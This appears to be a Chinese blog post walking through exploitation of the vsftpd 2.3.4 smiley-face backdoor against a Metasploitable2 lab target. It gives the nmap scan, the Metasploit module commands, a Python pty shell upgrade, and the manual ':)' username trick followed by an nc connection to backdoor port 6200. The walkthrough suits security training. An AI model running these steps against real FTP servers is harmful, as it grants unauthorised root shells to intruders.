vsftpd2.3.4 后门笑脸漏洞

漏洞概要

vsftpd 2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令

漏洞利用

攻击机:kali 2022 msfconsole利用或者nc连接后门端口利用
靶机: Metasploitable2-Linux,这是一个集成了很多漏洞的平台

msfconsole利用

首先使用nmap进行目标版本服务进行扫描
靶机IP为:172.16.1.104

nmap -sV -p- -n 172.16.1.104


开启msfconsole利用平台进行漏洞利用

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 172.16.1.104
run


漏洞利用成功,再利用成功后我们终端显示的非常难受,可以执行python命令获取一个虚拟终端

python -c "import pty;pty.spawn('/bin/sh')"

ftp直接连接服务,nc连接6200后门端口

使用ftp 172.16.1.104连接靶机,用户名输入任意用户名加:),例如root:)
密码随便输入

打开一个终端使用nc进行连接

nc 172.16.1.104 6200


漏洞利用成功

posted @ 2022-03-30 11:30  Junglezt  阅读(1073)  评论(0编辑  收藏  举报